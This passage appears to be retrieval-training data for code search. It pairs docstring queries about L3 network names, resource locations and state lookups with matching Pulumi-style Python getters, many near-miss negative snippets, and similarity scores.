"0.59922934",
"0.5961852",
"0.59380776",
"0.59224266",
"0.5904247",
"0.58965254",
"0.5884845",
"0.5841586",
"0.5811044",
"0.57858795",
"0.57753503",
"0.57629985",
"0.57561666",
"0.5749286",
"0.57438874",
"0.572851",
"0.5718094",
"0.57133394",
"0.57131594",
"0.570418",
"0.5700854",
"0.5697253",
"0.5693369",
"0.56607217",
"0.56362534",
"0.5634834",
"0.5634834",
"0.56252795",
"0.5624694",
"0.5611572",
"0.5611493",
"0.5585948",
"0.55839694",
"0.55762595",
"0.557162",
"0.55490845",
"0.55462766",
"0.5541481",
"0.55411285",
"0.5517764",
"0.55050266",
"0.5475352",
"0.54672366",
"0.54544413",
"0.5450409",
"0.54385674",
"0.54139763",
"0.54112065",
"0.53973544",
"0.5391061",
"0.5383078",
"0.5383049",
"0.5382081",
"0.5379691",
"0.53760344",
"0.5375599",
"0.5375143",
"0.53591913",
"0.53409517",
"0.5304832",
"0.5304832",
"0.5301838",
"0.5299387",
"0.52880913",
"0.52783364",
"0.52632976",
"0.52632976",
"0.5260236",
"0.5252007",
"0.5245292",
"0.52389383"
] | 0.74332094 | 4 |
The name of the L3 network. | def l3_network_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "l3_network_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def computer_network_name(self) -> str:\n return self._computer_network_name",
"def network_name(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"network_name\"), kwargs)",
"def name(self) -> str:\n return f\"{self._inst} NAT {self._data['name']}\"",
"def managed_network_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"managed_network_name\")",
"def layer_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"layer_name\")",
"def get_name():\n\n return 'nettools'",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def layer_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"layer_name\")",
"def cloud_services_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cloud_services_network_name\")",
"def network(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"network\")",
"def get_name(self):\n name_str = \"Brain\"\n name_str += \"_\" + self._memory.get_name() \n name_str += \"_ImgSize\" + str(self._img_size[0])\n name_str += \"_Nov\" + self._novelty_loss_type.upper()\n name_str += \"_Train\" + str(self._train_epochs_per_iter)\n name_str += \"_Lrate\" + str(self._learning_rate)\n return name_str",
"def __str__(self):\n\n return \"Network: {0}\".format(self.topology)",
"def layer_protocol_name(self) -> str:\n return self._layer_protocol_name",
"def nw_name(self):\n return self._nw_name",
"def get_network_name(self): # type: () -> str\n networks = self.get_network_names()\n\n if not networks:\n raise ApplicationError('No network found for Docker container: %s.' % self.id)\n\n if len(networks) > 1:\n raise ApplicationError('Found multiple networks for Docker container %s instead of only one: %s' % (self.id, ', '.join(networks)))\n\n return networks[0]",
"def get_network_name_on_vc(options):\n network = get_network_on_vc(options)\n if network:\n return network.name",
"def layer_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"layer_name\")",
"def name(self):\n return 'VL53L1X'",
"def get_node_name(self):\n return util.join_names_underscore(self.name, str(self.as_pointer()))",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def name(self):\n return utf82unicode(pn_link_name(self._impl))",
"def get_network_name(options):\n user = pwd.getpwuid(os.getuid())[0]\n return \"%s-%s\" %(user, options.name)",
"def _get_l3_label(self):\n return self.__l3_label",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def name(self) -> str:\n return self._alias or f\"Nut-{self._host}\"",
"def network_watcher_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_watcher_name\")",
"def getName(self):\n return _libsbml.XMLTriple_getName(self)",
"def get_name(self):\n \n return 'Loop-Back'",
"def name(self) -> str:\n return self.proto.name",
"def name(self) -> 'Literal[\"Dynamic Reverse Address Resolution Protocol\", \"Inverse Address Resolution Protocol\", \"Reverse Address Resolution Protocol\", \"Address Resolution Protocol\"]': # pylint: disable=line-too-long\n return self._name",
"def name(self):\n return 'n' + self._name\n # if self.children:\n # return 'fossil_' + self._name\n # else:\n # return 'society_' + self._name",
"def name_network(opt):\n optim = opt['optimizer'].__name__\n\n nn_tuple = (opt['method'], opt['upsampling_rate'],\n 2*opt['input_radius']+1,\n 2*opt['receptive_field_radius']+1,\n (2*opt['output_radius']+1)*opt['upsampling_rate'],\n optim, str(opt['dropout_rate']), opt['transform_opt'],)\n nn_str = '%s_us=%i_in=%i_rec=%i_out=%i_opt=%s_drop=%s_prep=%s_'\n nn_tuple += (opt['cohort'], opt['no_subjects'],\n opt['subsampling_rate'], opt['patchlib_idx'])\n nn_str += '%s_TS%i_Subsample%03i_%03i'\n\n return nn_str % nn_tuple",
"def get_name(self):\n \n return 'Socket/IP'",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def name(self):\n return self.device.get_station_name(self.station_number)",
"def private_network(self) -> str:\n return pulumi.get(self, \"private_network\")",
"def topology_name(self):\n return self._topology_name",
"def node_name(self):\n return self._node_name",
"def name(self):\n return self.proto.name",
"def get_name(self):\n return self.nvPublic.get_name()",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def name(self):\n return s.GLPK",
"def __str__(self):\n return ('NodesNetwork('\n f'uris: {self.uris.array}, '\n f'sockets: {self.sockets.array})')",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def _get_layer_name(self, layer):\n label = '{}-{}'.format(layer.label, layer.rank)\n if label not in self.naming_map:\n self.naming_map[label] = {}\n\n if layer not in self.naming_map[label].keys():\n self.naming_map[label][layer] = len(self.naming_map[label]) + 1\n return '{}-{}'.format(label, self.naming_map[label][layer])",
"def subnetwork_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnetwork_name\")",
"def name(self):\n return self._light.name",
"def _get_network(name):\n\n if name not in _NAME_TO_NETS:\n raise ValueError('Network name [%s] not recognized.' % name)\n return _NAME_TO_NETS[name].model",
"def __str__(self):\n return 'InteractingNetworks:\\n' + Network.__str__(self)",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def name(self):\n return self.attributes.workspace.name",
"def name(self):\n return self.mesh.name",
"def name(self):\n return self.mesh.name",
"def cluster_name(self):\n return self.name",
"def chain_name(self) -> str:\n return pulumi.get(self, \"chain_name\")",
"def name(self) -> str:\n station_name = self._get_station_name()\n return f\"{station_name} {self._fuel_type}\"",
"def name(self):\n return 'Greenlet-%d' % (self.minimal_ident,)",
"def name(self):\n return self.viztrail.name",
"def namespace_show_name(self) -> str:\n return pulumi.get(self, \"namespace_show_name\")",
"def name(self):\n return self.prefix",
"def returnNetworkNode(self):\n\n networkNodes = cmds.ls(type=\"network\")\n for node in networkNodes:\n attrs = cmds.listAttr(node)\n if \"moduleName\" in attrs:\n if cmds.getAttr(node + \".moduleName\") == self.name:\n networkNode = node\n\n return networkNode",
"def get_name(self):\n \n return 'UDP/IP Server'",
"def name(self) -> Text:\n\n return \"5knn_state\"",
"def node_name(self) -> str:\n return typing.cast(\n str,\n self._properties.get(\"nodeName\"),\n )",
"def network(self):\n return self.__network",
"def _generate_node_name(self):\r\n while 1:\r\n name = \"node\" + str(self._name_sequence)\r\n if name not in self.nodes.keys():\r\n break\r\n self._name_sequence += 1\r\n\r\n return name",
"def getDatabaseName(self):\n return f\"n{self.name.capitalize()}\"",
"def name(self):\n return self._scene_name",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def name ( self ) :\n return self.__name if self.__name else ''",
"def node_name(self) -> str:\n op_name = f\"{self.name.name}_{self.name.overload_name}\".lower()\n return \"\".join(word.capitalize() or \"\" for word in op_name.split(\"_\"))",
"def read_name(self):\n return self.node.read_name()",
"def read_name(self):\n return self.node.read_name()",
"def read_name(self):\n return self.node.read_name()",
"def read_name(self):\n return self.node.read_name()",
"def get_name(cls):\n\t\treturn '' if cls is SAM3X else cls.__name__",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")"
] | [
"0.6955331",
"0.6824133",
"0.6799091",
"0.6677395",
"0.66031",
"0.6491807",
"0.6462104",
"0.64592564",
"0.64398986",
"0.63908404",
"0.63872564",
"0.638713",
"0.63722634",
"0.6359511",
"0.6331267",
"0.63089246",
"0.62042356",
"0.6186131",
"0.61773044",
"0.61605525",
"0.6082077",
"0.60543025",
"0.60192996",
"0.6005461",
"0.59952414",
"0.59952414",
"0.59952414",
"0.5986967",
"0.59714127",
"0.5953963",
"0.5936222",
"0.59344983",
"0.59284234",
"0.5901047",
"0.58911264",
"0.58861",
"0.5869498",
"0.58619165",
"0.5854023",
"0.58530134",
"0.58390796",
"0.583566",
"0.58315986",
"0.58186805",
"0.5816096",
"0.58026093",
"0.57839316",
"0.57839316",
"0.57821304",
"0.5781985",
"0.57736707",
"0.57704574",
"0.57435584",
"0.57235163",
"0.5716776",
"0.5704344",
"0.5704344",
"0.5703192",
"0.5695342",
"0.56767225",
"0.567448",
"0.5673451",
"0.5667695",
"0.5648024",
"0.5634939",
"0.56264967",
"0.56222385",
"0.56209815",
"0.5615781",
"0.5612387",
"0.5579998",
"0.557467",
"0.55710113",
"0.55576307",
"0.5551923",
"0.5547658",
"0.5547658",
"0.5547658",
"0.5547658",
"0.5539167",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228"
] | 0.88098806 | 0 |
The geolocation where the resource lives | def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_location(self):\n\t\treturn self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\r\n return self.__location",
"def get_location(self):\r\n return None",
"def getLocation(self):\n return self._Location",
"def geolocation(self):\n return self.get_property('geolocation', GeolocationColumn())",
"def location(self):\n return self.geometry.location",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def get_current_locate(self) -> dict:\r\n geolocate: dict = self.gmaps.geolocate()\r\n return geolocate",
"def geolocation(self):\n if self.latitude and self.longitude:\n return self.longitude, self.latitude",
"def Lokation(self):\n return self.getMylocation()",
"def location(self):\r\n return self._get('location', {})",
"def get_location(self) -> tuple:\n return self.__location",
"def location(self) -> object:\n return self._location",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def getLocation(self):\n send_url = 'https://ipinfo.io'\n r = requests.get(send_url)\n resp = json.loads(r.text)\n logging.info(\"GeoLoc: {}\".format(resp))\n return resp",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def geo(self):\n return self.query.geo",
"def location(self) -> Object:\n return self._location",
"def locate(self):\n if self.location == '':\n return None\n if self.coords is not None:\n return self.coords\n\n loc = urlencode({'address': self.location})\n urldoc = urlopen(User._GMAP_URL.format(query=loc))\n jsObj = json.loads(urldoc.readall().decode('utf-8'))\n if len(jsObj['results']) > 0:\n # discard commercial results\n locTypes = jsObj['results'][0]['address_components'][0]['types']\n if not 'premise' in locTypes and not 'route' in locTypes and not 'establishment' in locTypes and not 'subpremise' in locTypes:\n self.coords = jsObj['results'][0]['geometry']['location']\n return self.coords\n # still here? it's all rubbish\n return None",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def m_location_get(self) -> Point:\n pass",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def get_current_location(self):\n return self.enu_2_local()",
"def location(self) -> str:\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def get_location(self) -> models.Location:\n return models.Location.get(region=self, name=self.name, deleted=False)",
"def get_location(self) -> Union[str, None]:\n return self._get_location()",
"def location(self) -> str:\n return self.metadata.location",
"def get_location(self):\r\n response = self.connection.make_request('GET', self.name,\r\n query_args='location')\r\n body = response.read()\r\n if response.status == 200:\r\n rs = ResultSet(self)\r\n h = handler.XmlHandler(rs, self)\r\n xml.sax.parseString(body, h)\r\n return rs.LocationConstraint\r\n else:\r\n raise self.connection.provider.storage_response_error(\r\n response.status, response.reason, body)",
"def location(self):\n if \"location\" in self._prop_dict:\n if isinstance(self._prop_dict[\"location\"], OneDriveObjectBase):\n return self._prop_dict[\"location\"]\n else :\n self._prop_dict[\"location\"] = Location(self._prop_dict[\"location\"])\n return self._prop_dict[\"location\"]\n\n return None",
"def get_relative_location(self):\n http = urllib3.PoolManager()\n url = 'http://ipinfo.io/json'\n response = http.request('GET', url)\n soup = BeautifulSoup(response.data, features=\"html5lib\")\n soup = str(soup).split(\"body\")[1][1:-2]\n try:\n soup = ast.literal_eval(soup)\n self.ip_addr = soup['ip']\n self.location = soup['loc']\n except Exception as e:\n print(\"Approximate address can not be determined...\")\n self.ip_addr = None\n self.location = None",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self, ip_address):\n location = None\n url = \"http://dazzlepod.com/ip/{0}.json\".format(ip_address)\n status_code, json_data = self.urlopen(url)\n if status_code == 200 and json_data:\n tmp_location = json.loads(json_data)\n if 'latitude' in tmp_location and 'longitude' in tmp_location:\n location = tmp_location\n return location",
"def get_location(self):\n # h = b'\\r\\nAT-MSGEO\\r\\r\\n-MSGEO: -3936,3464,-3612,7402d50c\\r\\n\\r\\n'\n # an example of the string returned from the AT-MSGEO used for testing.\n h = self.acquire_response(b'AT-MSGEO')\n if isinstance(h, bytes):\n h = h.decode('utf-8')\n h = h.strip()\n h = h.split(':')\n h = h[1].split(',')\n x = int(h[0])*1000 # Convert coordinates to meters.\n y = int(h[1])*1000\n z = int(h[2])*1000\n else:\n print('Location not available')\n\n # 'geocent' refers to the geo-centered frame that the co-ordinates are returned in\n inProj = Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n\n # 'latlong' is the frame to be converted to\n outProj = Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n\n # Convert X, Y, Z to latitude, longitude and altitude\n long, lat, alt = transform(inProj, outProj, x, y, z, radians=False)\n # l = [str(long), str(lat), str(alt)]\n return long, lat, alt",
"def get_current_location(self):\n return self._current_loc",
"def founding_location(self) -> object:\n return self._founding_location",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def _get_location(self):\n return industry.Location(itemID=self.locationID, flagID=self.locationFlagID, ownerID=self.ownerID, typeID=self.locationTypeID)",
"def get_geolocation(self, location):\n\n response = self.request(dict(\n method=\"GET\",\n query=dict(location=location),\n ))\n\n return response['data']",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def user_place(self):\n place = self.status.user['location']\n return place",
"def location_a(self):\n return self._location_a",
"def location_info(self) -> LocationInfoIm:\n return self._location_info",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def _get_current_location(self):\n return self.get_queryset().filter(status=self.model.CURRENT).first()",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def location_hint(self) -> str:\n return pulumi.get(self, \"location_hint\")",
"def location(self):\n return self.element.location",
"def Loc(self):\n return self.Localize",
"def returncarlocation(self):\n retrieved_location = self.update_car_location()\n if retrieved_location:\n self.currentcar_location[\"Longitude\"] = retrieved_location[\"Longitude\"]\n self.currentcar_location[\"Latitude\"] = retrieved_location[\"Latitude\"]\n self.currentcar_location[\"Time\"] = datetime.now()\n return self.currentcar_location",
"def location(self) -> CameraLocationType:\n return self._location",
"def location(self):\n return [self.lat, self.lon]",
"def get_player_location(self):\n return self.player.location",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def location(self, time: int) -> Location:\n self.refreshDroneStatus(time)\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def get_pokemon_location(self):\n return self._pokemon_location",
"def locations(self):\r\n return resource.Location(self)"
] | [
"0.816298",
"0.7999453",
"0.79540074",
"0.7945644",
"0.78364915",
"0.77626437",
"0.7730134",
"0.7681095",
"0.7624169",
"0.76093256",
"0.76093256",
"0.75724584",
"0.75544393",
"0.7547195",
"0.75165695",
"0.74507827",
"0.74267685",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7406362",
"0.7359666",
"0.73106575",
"0.7298844",
"0.72935575",
"0.72554076",
"0.7220563",
"0.72126144",
"0.72126144",
"0.72126144",
"0.718496",
"0.7151951",
"0.710894",
"0.710894",
"0.710894",
"0.7102068",
"0.7084974",
"0.70708954",
"0.7024406",
"0.70236313",
"0.7014063",
"0.69928896",
"0.69530916",
"0.69379604",
"0.6935117",
"0.69253886",
"0.6905298",
"0.690296",
"0.6884053",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.6883943",
"0.68591607",
"0.6844422",
"0.68391085",
"0.68391085",
"0.68391085",
"0.68391085",
"0.6816552",
"0.67645866",
"0.6751419",
"0.67463267",
"0.67445743",
"0.6738971",
"0.67155385",
"0.67094636",
"0.6681957",
"0.66757774",
"0.66720206",
"0.666216",
"0.66248953",
"0.6623208",
"0.6617238",
"0.66021705",
"0.66020995",
"0.65998936"
] | 0.0 | -1 |
Get an existing L3Network resource's state with the given name, id, and optional extra properties used to qualify the lookup. | def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'L3Network':
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = L3NetworkArgs.__new__(L3NetworkArgs)
__props__.__dict__["associated_resource_ids"] = None
__props__.__dict__["cluster_id"] = None
__props__.__dict__["detailed_status"] = None
__props__.__dict__["detailed_status_message"] = None
__props__.__dict__["extended_location"] = None
__props__.__dict__["hybrid_aks_clusters_associated_ids"] = None
__props__.__dict__["hybrid_aks_ipam_enabled"] = None
__props__.__dict__["hybrid_aks_plugin_type"] = None
__props__.__dict__["interface_name"] = None
__props__.__dict__["ip_allocation_type"] = None
__props__.__dict__["ipv4_connected_prefix"] = None
__props__.__dict__["ipv6_connected_prefix"] = None
__props__.__dict__["l3_isolation_domain_id"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["virtual_machines_associated_ids"] = None
__props__.__dict__["vlan"] = None
return L3Network(resource_name, opts=opts, __props__=__props__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def a_state(id):\n state = storage.get(State, id)\n if state is not None:\n return jsonify(state.to_dict())\n abort(404)",
"def get_state_by_id(state_id):\n state = storage.get(State, state_id)\n if not state:\n abort(404)\n return jsonify(state.to_dict()), 200",
"def get_state_by_name(exploration_id, state_name, strict=True):\n exploration = get_exploration_by_id(exploration_id)\n assert state_name\n\n # TODO(sll): This is too slow; improve it.\n state = None\n for candidate_state in exploration.states:\n if candidate_state.name == state_name:\n state = candidate_state\n break\n\n if strict and not state:\n raise Exception('State %s not found' % state_name)\n return state",
"def get_state_by_id(state_id):\n my_state = storage.get('State', state_id)\n if my_state is None:\n abort(404)\n return jsonify(my_state.to_dict())",
"def get_state_by_id(state_id):\n for key, value in storage.all(\"State\").items():\n if state_id == value.id:\n return jsonify(value.to_dict())\n abort(404)",
"def get_state(state_id):\n try:\n ''' Check that state_id exists '''\n query = State.select().where(State.id == state_id)\n if not query.exists():\n raise LookupError('state_id')\n\n state = State.get(State.id == state_id)\n return state.to_dict(), 200\n except LookupError as e:\n abort(404)\n except Exception as e:\n abort(500)",
"def get_network(self, name_or_id, filters=None):\n if not filters:\n filters = {}\n return self.network.find_network(\n name_or_id=name_or_id, ignore_missing=True, **filters\n )",
"def get_state_by_id(exploration_id, state_id, strict=True):\n # TODO(sll): Generalize this to handle multiple state_ids at a time.\n state_memcache_key = _get_state_memcache_key(exploration_id, state_id)\n memcached_state = memcache_services.get_multi(\n [state_memcache_key]).get(state_memcache_key)\n\n if memcached_state is not None:\n return memcached_state\n else:\n state_model = exp_models.StateModel.get(\n exploration_id, state_id, strict=strict)\n if state_model:\n state = exp_domain.State.from_dict(state_id, state_model.value)\n memcache_services.set_multi({state_memcache_key: state})\n return state\n else:\n return None",
"def state_by_id(state_id):\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n return jsonify(state.to_dict())",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n remote_address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n remote_virtual_network_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None,\n virtual_network_id: Optional[pulumi.Input[str]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None) -> 'VirtualNetworkPeering':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _VirtualNetworkPeeringState.__new__(_VirtualNetworkPeeringState)\n\n __props__.__dict__[\"address_space_prefixes\"] = address_space_prefixes\n __props__.__dict__[\"allow_forwarded_traffic\"] = allow_forwarded_traffic\n __props__.__dict__[\"allow_gateway_transit\"] = allow_gateway_transit\n __props__.__dict__[\"allow_virtual_network_access\"] = allow_virtual_network_access\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"remote_address_space_prefixes\"] = remote_address_space_prefixes\n __props__.__dict__[\"remote_virtual_network_id\"] = remote_virtual_network_id\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"use_remote_gateways\"] = use_remote_gateways\n __props__.__dict__[\"virtual_network_id\"] = virtual_network_id\n __props__.__dict__[\"workspace_id\"] = workspace_id\n return VirtualNetworkPeering(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'CloudServicesNetwork':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = CloudServicesNetworkArgs.__new__(CloudServicesNetworkArgs)\n\n __props__.__dict__[\"additional_egress_endpoints\"] = None\n __props__.__dict__[\"associated_resource_ids\"] = None\n __props__.__dict__[\"cluster_id\"] = None\n __props__.__dict__[\"detailed_status\"] = None\n __props__.__dict__[\"detailed_status_message\"] = None\n __props__.__dict__[\"enable_default_egress_endpoints\"] = None\n __props__.__dict__[\"enabled_egress_endpoints\"] = None\n __props__.__dict__[\"extended_location\"] = None\n __props__.__dict__[\"hybrid_aks_clusters_associated_ids\"] = None\n __props__.__dict__[\"interface_name\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"system_data\"] = None\n __props__.__dict__[\"tags\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"virtual_machines_associated_ids\"] = None\n return CloudServicesNetwork(resource_name, opts=opts, __props__=__props__)",
"def get_state_by_id(state_id):\r\n response = Response(json.dumps(json_error(ResponsesREST.INVALID_INPUT.value)),\r\n status=ResponsesREST.INVALID_INPUT.value, mimetype=\"application/json\")\r\n if validator_id.is_valid({\"id\": state_id}):\r\n state_get = State()\r\n state_get.id_state = state_id\r\n result = state_get.get_state()\r\n if result in (ResponsesREST.NOT_FOUND.value, ResponsesREST.SERVER_ERROR.value):\r\n response = Response(json.dumps(json_error(result)),\r\n status=result, mimetype=\"application/json\")\r\n else:\r\n response = Response(json.dumps(result.json_state()),\r\n status=ResponsesREST.SUCCESSFUL.value,\r\n mimetype=\"application/json\")\r\n return response",
"def get_state(self, entity_id: str, attribute: str = \"state\") -> dict:\n if not self.connected:\n LOGGER.warning(\"Connection is not yet ready.\")\n state_obj = self._states.get(entity_id)\n if state_obj:\n if attribute == \"state\":\n return state_obj[\"state\"]\n if attribute:\n return state_obj[\"attributes\"].get(attribute)\n return state_obj\n return None",
"def state_by_id(state_id):\n states_values = storage.all(\"State\").values()\n for obj in states_values:\n if obj.id == state_id:\n return jsonify(obj.to_dict())\n abort(404)",
"def getstate(self,name):\n state = self.states[name]\n debug('kfnode.getstate ',(name,state))\n return state",
